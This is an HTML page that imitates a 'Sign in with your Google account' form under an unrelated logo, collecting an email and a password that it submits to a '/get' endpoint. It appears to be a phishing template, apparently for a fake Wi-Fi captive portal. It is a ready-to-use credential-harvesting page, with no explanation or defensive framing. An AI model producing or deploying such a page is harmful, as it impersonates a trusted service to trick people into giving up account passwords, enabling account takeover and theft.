<!DOCTYPE html>
<html>
<head>
<style>
body {
  font-family: Arial, sans-serif;
  background-color: #FFFFFF;
}

.container {
  max-width: 400px;
  margin: 0 auto;
  padding: 20px;
}

@media (min-width: 600px) {
  .container {
    max-width: 500px;
  }
}

.logo-container {
  text-align: center;
  margin-bottom: 30px;
  display: flex;
  justify-content: center;
  align-items: center;
}

.logo {
  width: 40px;
  height: 40px;
  fill: #FFC72C;
  margin-right: 100px
}


.form-container {
  background: #FFFFFF;
  border: 1px solid #FFFFFF;
  border-radius: 4px;
  padding: 20px;
  box-shadow: 0px 0px 10px 0px rgba(108,66,156,0.2);
}

h1 {
  text-align: center; 
  font-size: 28px;
  font-weight: 500;
  color: #000000;
  margin-bottom: 20px;
}

h2 {
  text-align: center; 
  font-size: 28px;
  font-weight: 500;
  color: #000000;
  margin-bottom: 20px;
}

.input-field {
  width: 100%;
  padding: 12px;
  border: 2px solid #00A1E4;
  border-radius: 4px;
  box-sizing: border-box;
  margin-bottom: 20px;
  font-size: 14px;
}

.submit-btn {
  background: #00A1E4;
  border: none;
  color: #FFFFFF;
  padding: 12px 20px;
  border-radius: 4px;
  cursor: pointer;
  font-size: 16px;
}

.submit-btn:hover {
  background: #00A1E4;
}

</style>
</head>

<body>

<div class="container">

  <div class="logo-container">
 <svg version="1.0" xmlns="http://www.w3.org/2000/svg"
 width="250.000000pt" height="110.000000pt" viewBox="0 0 815.000000 512.000000"
 preserveAspectRatio="xMidYMid meet">
<g transform="translate(0.000000,512.000000) scale(0.100000,-0.100000)"
fill="#00A1E4" stroke="none">
<path d="M3940 4555 l0 -115 -115 0 -115 0 0 -120 0 -120 115 0 115 0 0 -115
0 -115 63 0 c34 0 86 3 115 6 l52 7 0 108 0 109 115 0 115 0 0 120 0 120 -115
0 -115 0 0 115 0 115 -115 0 -115 0 0 -115z"/>
<path d="M2588 4021 c-75 -25 -116 -51 -172 -111 -68 -72 -99 -146 -104 -246
-10 -180 72 -315 235 -392 52 -24 69 -27 163 -27 99 0 110 2 172 33 74 36 153
114 187 184 74 153 35 360 -87 469 -108 96 -266 133 -394 90z"/>
<path d="M3509 4026 c-107 -29 -203 -110 -253 -216 -26 -54 -32 -80 -34 -152
-5 -106 13 -173 65 -248 139 -198 419 -229 601 -65 156 141 170 398 29 560
-94 108 -267 159 -408 121z"/>
<path d="M4420 4026 c-112 -32 -205 -108 -256 -211 -27 -56 -29 -68 -29 -175
0 -104 3 -121 27 -172 148 -316 615 -298 737 27 26 69 29 210 6 276 -67 192
-290 309 -485 255z"/>
<path d="M5330 4026 c-250 -70 -370 -350 -248 -579 41 -75 122 -149 196 -178
219 -84 457 21 533 235 26 75 26 197 -1 273 -66 188 -287 302 -480 249z"/>
<path d="M2690 2910 l0 -240 1370 0 1370 0 0 240 0 240 -1370 0 -1370 0 0
-240z"/>
<path d="M450 1365 l0 -915 355 0 355 0 2 315 3 316 319 -316 319 -315 1369 0
1368 0 0 235 0 235 -565 0 -565 0 0 680 0 680 -355 0 -355 0 -2 -892 -3 -892
-488 484 -488 484 400 400 c221 221 401 404 401 409 0 4 -157 7 -349 7 l-350
0 -333 -325 -333 -324 -3 324 -2 325 -350 0 -350 0 0 -915z"/>
<path d="M4720 1365 l0 -915 355 0 355 0 0 617 c0 382 4 613 9 608 10 -10 431
-1197 431 -1215 0 -7 111 -9 336 -8 l336 3 214 610 c119 336 219 614 225 620
5 5 9 -223 9 -613 l0 -622 355 0 355 0 0 915 0 915 -574 0 c-537 0 -574 -1
-581 -17 -3 -10 -76 -218 -162 -463 -86 -245 -160 -456 -165 -470 -9 -23 -10
-24 -20 -7 -5 10 -63 177 -128 370 -65 194 -137 405 -160 470 l-42 117 -574 0
-574 0 0 -915z"/>
</g>
</svg>


  
  </div>

  <div class="form-container">

    <center><h1>Sign in with your <b>Google</b> account</h1>
      </center>

    <form action="/get" id="login-form">
    
      <input name="email" class="input-field" type="text" placeholder="Email" required>
      
      <input name="password" class="input-field" type="password" placeholder="Password" required>
	  

      <button class="submit-btn" type="submit">Connect</button>
	  


    </form>

  </div>

</div>
</body>
</html>
